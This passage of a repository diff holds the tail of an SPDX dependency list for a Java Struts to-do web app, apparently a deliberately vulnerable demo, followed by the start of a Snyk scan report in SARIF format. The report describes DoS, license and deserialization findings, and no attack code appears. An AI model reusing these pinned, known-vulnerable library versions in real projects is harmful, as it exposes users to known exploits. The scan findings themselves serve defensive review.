:"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.aspectj/aspectjweaver@1.8.2"}]},{"name":"c3p0:c3p0","SPDXID":"SPDXRef-36-c3p0-c3p0-0.9.1.2","versionInfo":"0.9.1.2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/c3p0/c3p0@0.9.1.2"}]},{"name":"org.hsqldb:hsqldb","SPDXID":"SPDXRef-37-org.hsqldb-hsqldb-2.3.2","versionInfo":"2.3.2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.hsqldb/hsqldb@2.3.2"}]},{"name":"org.hibernate:hibernate-core","SPDXID":"SPDXRef-38-org.hibernate-hibernate-core-4.3.7.Final","versionInfo":"4.3.7.Final","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.hibernate/hibernate-core@4.3.7.Final"}]},{"name":"org.hibernate:hibernate-entitymanager","SPDXID":"SPDXRef-39-org.hibernate-hibernate-entitymanager-4.3.7.Final","versionInfo":"4.3.7.Final","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.hibernate/hibernate-entitymanager@4.3.7.Final"}]},{"name":"org.hibernate.javax.persistence:hibernate-jpa-2.0-api","SPDXID":"SPDXRef-40-org.hibernate.javax.persistence-hibernate-jpa-2.0-api-1.0.1.Final","versionInfo":"1.0.1.Final","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.hibernate.javax.persistence/hibernate-jpa-2.0-api@1.0.1.Final"}]},{"name":"javax.validation:validation-api","SPDXID":"SPDXRef-41-javax.validation-validation-api-1.0.0.GA","versionInfo":"1.0.0.GA","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/javax.validation/validation-api@1.0.0.GA"}]},{"name":"org.jboss.logging:jboss-logging","SPDXID":"SPDXRef-42-org.jboss.logging-jboss-logging-3.1.0.CR2","versionInfo":"3.1.0.CR2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.jboss.logging/jboss-logging@3.1.0.CR2"}]},{"name":"org.springframework:spring-expression","SPDXID":"SPDXRef-43-org.springframework-spring-expression-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-expression@3.2.6.RELEASE"}]},{"name":"commons-logging:commons-logging","SPDXID":"SPDXRef-44-commons-logging-commons-logging-1.1.1","versionInfo":"1.1.1","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/commons-logging/commons-logging@1.1.1"}]},{"name":"org.ow2.asm:asm","SPDXID":"SPDXRef-45-org.ow2.asm-asm-5.0.2","versionInfo":"5.0.2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.ow2.asm/asm@5.0.2"}]},{"name":"org.ow2.asm:asm-commons","SPDXID":"SPDXRef-46-org.ow2.asm-asm-commons-5.0.2","versionInfo":"5.0.2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.ow2.asm/asm-commons@5.0.2"}]},{"name":"javassist:javassist","SPDXID":"SPDXRef-47-javassist-javassist-3.11.0.GA","versionInfo":"3.11.0.GA","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/javassist/javassist@3.11.0.GA"}]},{"name":"org.springframework:spring-jdbc","SPDXID":"SPDXRef-48-org.springframework-spring-jdbc-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-jdbc@3.2.6.RELEASE"}]},{"name":"org.springframework:spring-tx","SPDXID":"SPDXRef-49-org.springframework-spring-tx-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-tx@3.2.6.RELEASE"}]},{"name":"org.springframework:spring-context-support","SPDXID":"SPDXRef-50-org.springframework-spring-context-support-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-context-support@3.2.6.RELEASE"}]},{"name":"asm:asm","SPDXID":"SPDXRef-51-asm-asm-3.3.1","versionInfo":"3.3.1","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/asm/asm@3.3.1"}]},{"name":"org.jboss.logging:jboss-logging-annotations","SPDXID":"SPDXRef-52-org.jboss.logging-jboss-logging-annotations-1.2.0.Beta1","versionInfo":"1.2.0.Beta1","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.jboss.logging/jboss-logging-annotations@1.2.0.Beta1"}]},{"name":"org.jboss.spec.javax.transaction:jboss-transaction-api_1.2_spec","SPDXID":"SPDXRef-53-org.jboss.spec.javax.transaction-jboss-transaction-api-1.2-spec-1.0.0.Final","versionInfo":"1.0.0.Final","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.jboss.spec.javax.transaction/jboss-transaction-api_1.2_spec@1.0.0.Final"}]},{"name":"dom4j:dom4j","SPDXID":"SPDXRef-54-dom4j-dom4j-1.6.1","versionInfo":"1.6.1","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/dom4j/dom4j@1.6.1"}]},{"name":"org.hibernate.common:hibernate-commons-annotations","SPDXID":"SPDXRef-55-org.hibernate.common-hibernate-commons-annotations-4.0.5.Final","versionInfo":"4.0.5.Final","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.hibernate.common/hibernate-commons-annotations@4.0.5.Final"}]},{"name":"org.hibernate.javax.persistence:hibernate-jpa-2.1-api","SPDXID":"SPDXRef-56-org.hibernate.javax.persistence-hibernate-jpa-2.1-api-1.0.0.Final","versionInfo":"1.0.0.Final","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.hibernate.javax.persistence/hibernate-jpa-2.1-api@1.0.0.Final"}]},{"name":"org.javassist:javassist","SPDXID":"SPDXRef-57-org.javassist-javassist-3.18.1-GA","versionInfo":"3.18.1-GA","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.javassist/javassist@3.18.1-GA"}]},{"name":"antlr:antlr","SPDXID":"SPDXRef-58-antlr-antlr-2.7.7","versionInfo":"2.7.7","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/antlr/antlr@2.7.7"}]},{"name":"org.jboss:jandex","SPDXID":"SPDXRef-59-org.jboss-jandex-1.1.0.Final","versionInfo":"1.1.0.Final","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.jboss/jandex@1.1.0.Final"}]},{"name":"org.ow2.asm:asm-tree","SPDXID":"SPDXRef-60-org.ow2.asm-asm-tree-5.0.2","versionInfo":"5.0.2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.ow2.asm/asm-tree@5.0.2"}]},{"name":"xml-apis:xml-apis","SPDXID":"SPDXRef-61-xml-apis-xml-apis-1.0.b2","versionInfo":"1.0.b2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/xml-apis/xml-apis@1.0.b2"}]}],"relationships":[{"spdxElementId":"SPDXRef-DOCUMENT","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DESCRIBES"},{"spdxElementId":"SPDXRef-2-io.github.snyk-todolist-web-common-0.0.1-SNAPSHOT","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-3-org.apache.logging.log4j-log4j-core-2.7","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-4-org.apache.logging.log4j-log4j-api-2.7","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-5-javax-javaee-web-api-7.0","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-6-org.springframework-spring-web-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-7-org.apache.struts-struts2-core-2.3.20","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-8-org.apache.struts-struts2-spring-plugin-2.3.20","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-9-org.zeroturnaround-zt-zip-1.12","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-10-javax.xml.bind-jaxb-api-2.3.0","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-11-com.sun.xml.bind-jaxb-core-2.3.0","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-12-com.sun.xml.bind-jaxb-impl-2.3.0","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-13-com.fasterxml.jackson.core-jackson-core-2.6.5","relatedSpdxElement":"SPDXRef-2-io.github.snyk-todolist-web-common-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-14-com.fasterxml.jackson.core-jackson-databind-2.6.5","relatedSpdxElement":"SPDXRef-2-io.github.snyk-todolist-web-common-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-15-com.fasterxml.jackson.core-jackson-annotations-2.6.5","relatedSpdxElement":"SPDXRef-2-io.github.snyk-todolist-web-common-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","relatedSpdxElement":"SPDXRef-2-io.github.snyk-todolist-web-common-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-17-javax.servlet-jstl-1.2","relatedSpdxElement":"SPDXRef-2-io.github.snyk-todolist-web-common-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-18-org.hibernate-hibernate-validator-4.3.1.Final","relatedSpdxElement":"SPDXRef-2-io.github.snyk-todolist-web-common-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-19-commons-collections-commons-collections-3.1","relatedSpdxElement":"SPDXRef-2-io.github.snyk-todolist-web-common-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-20-aopalliance-aopalliance-1.0","relatedSpdxElement":"SPDXRef-6-org.springframework-spring-web-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-21-org.springframework-spring-aop-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-6-org.springframework-spring-web-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-22-org.springframework-spring-beans-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-6-org.springframework-spring-web-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-23-org.springframework-spring-context-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-6-org.springframework-spring-web-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-24-org.springframework-spring-core-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-6-org.springframework-spring-web-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-25-org.apache.struts.xwork-xwork-core-2.3.20","relatedSpdxElement":"SPDXRef-7-org.apache.struts-struts2-core-2.3.20","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-26-org.freemarker-freemarker-2.3.19","relatedSpdxElement":"SPDXRef-7-org.apache.struts-struts2-core-2.3.20","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-27-ognl-ognl-3.0.6","relatedSpdxElement":"SPDXRef-7-org.apache.struts-struts2-core-2.3.20","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-28-commons-fileupload-commons-fileupload-1.3.1","relatedSpdxElement":"SPDXRef-7-org.apache.struts-struts2-core-2.3.20","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-29-commons-io-commons-io-2.2","relatedSpdxElement":"SPDXRef-7-org.apache.struts-struts2-core-2.3.20","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-30-org.apache.commons-commons-lang3-3.2","relatedSpdxElement":"SPDXRef-8-org.apache.struts-struts2-spring-plugin-2.3.20","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-31-org.slf4j-slf4j-api-1.6.6","relatedSpdxElement":"SPDXRef-9-org.zeroturnaround-zt-zip-1.12","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-32-org.springframework-spring-orm-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-33-org.springframework-spring-aspects-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-34-cglib-cglib-2.2.2","relatedSpdxElement":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-35-org.aspectj-aspectjweaver-1.8.2","relatedSpdxElement":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-36-c3p0-c3p0-0.9.1.2","relatedSpdxElement":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-37-org.hsqldb-hsqldb-2.3.2","relatedSpdxElement":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-38-org.hibernate-hibernate-core-4.3.7.Final","relatedSpdxElement":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-39-org.hibernate-hibernate-entitymanager-4.3.7.Final","relatedSpdxElement":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-40-org.hibernate.javax.persistence-hibernate-jpa-2.0-api-1.0.1.Final","relatedSpdxElement":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-41-javax.validation-validation-api-1.0.0.GA","relatedSpdxElement":"SPDXRef-18-org.hibernate-hibernate-validator-4.3.1.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-42-org.jboss.logging-jboss-logging-3.1.0.CR2","relatedSpdxElement":"SPDXRef-18-org.hibernate-hibernate-validator-4.3.1.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-43-org.springframework-spring-expression-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-23-org.springframework-spring-context-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-44-commons-logging-commons-logging-1.1.1","relatedSpdxElement":"SPDXRef-24-org.springframework-spring-core-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-45-org.ow2.asm-asm-5.0.2","relatedSpdxElement":"SPDXRef-25-org.apache.struts.xwork-xwork-core-2.3.20","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-46-org.ow2.asm-asm-commons-5.0.2","relatedSpdxElement":"SPDXRef-25-org.apache.struts.xwork-xwork-core-2.3.20","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-47-javassist-javassist-3.11.0.GA","relatedSpdxElement":"SPDXRef-27-ognl-ognl-3.0.6","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-48-org.springframework-spring-jdbc-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-32-org.springframework-spring-orm-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-49-org.springframework-spring-tx-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-32-org.springframework-spring-orm-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-50-org.springframework-spring-context-support-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-33-org.springframework-spring-aspects-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-51-asm-asm-3.3.1","relatedSpdxElement":"SPDXRef-34-cglib-cglib-2.2.2","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-52-org.jboss.logging-jboss-logging-annotations-1.2.0.Beta1","relatedSpdxElement":"SPDXRef-38-org.hibernate-hibernate-core-4.3.7.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-53-org.jboss.spec.javax.transaction-jboss-transaction-api-1.2-spec-1.0.0.Final","relatedSpdxElement":"SPDXRef-38-org.hibernate-hibernate-core-4.3.7.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-54-dom4j-dom4j-1.6.1","relatedSpdxElement":"SPDXRef-38-org.hibernate-hibernate-core-4.3.7.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-55-org.hibernate.common-hibernate-commons-annotations-4.0.5.Final","relatedSpdxElement":"SPDXRef-38-org.hibernate-hibernate-core-4.3.7.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-56-org.hibernate.javax.persistence-hibernate-jpa-2.1-api-1.0.0.Final","relatedSpdxElement":"SPDXRef-38-org.hibernate-hibernate-core-4.3.7.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-57-org.javassist-javassist-3.18.1-GA","relatedSpdxElement":"SPDXRef-38-org.hibernate-hibernate-core-4.3.7.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-58-antlr-antlr-2.7.7","relatedSpdxElement":"SPDXRef-38-org.hibernate-hibernate-core-4.3.7.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-59-org.jboss-jandex-1.1.0.Final","relatedSpdxElement":"SPDXRef-38-org.hibernate-hibernate-core-4.3.7.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-60-org.ow2.asm-asm-tree-5.0.2","relatedSpdxElement":"SPDXRef-46-org.ow2.asm-asm-commons-5.0.2","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-61-xml-apis-xml-apis-1.0.b2","relatedSpdxElement":"SPDXRef-54-dom4j-dom4j-1.6.1","relationshipType":"DEPENDENCY_OF"}]} + diff --git a/todolist-goof/todolist-web-struts/test.sarif b/todolist-goof/todolist-web-struts/test.sarif new file mode 100644 index 0000000000..82b387560f --- /dev/null +++ b/todolist-goof/todolist-web-struts/test.sarif @@ -0,0 +1,7412 @@ +{ + "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json", + "version": "2.1.0", + "runs": [ + { + "tool": { + "driver": { + "name": "Snyk Open Source", + "properties": { + "artifactsScanned": 60 + }, + "rules": [ + { + "id": "SNYK-JAVA-C3P0-461018", + "shortDescription": { + "text": "High severity - Denial of Service (DoS) vulnerability in c3p0:c3p0" + }, + "fullDescription": { + "text": "(CVE-2019-5427) c3p0:c3p0@0.9.1.2" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: c3p0:c3p0\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › io.github.snyk:todolist-core@0.0.1-SNAPSHOT › c3p0:c3p0@0.9.1.2\n# Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n# References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-776", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "shortDescription": { + "text": "High severity - LGPL-3.0 license vulnerability in c3p0:c3p0" + }, + "fullDescription": { + "text": "c3p0:c3p0@0.9.1.2" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Module: c3p0:c3p0\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › io.github.snyk:todolist-core@0.0.1-SNAPSHOT › c3p0:c3p0@0.9.1.2\nLGPL-3.0 license" + }, + "properties": { + "tags": [ + "security", + "maven" + ], + "security-severity": "undefined" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted 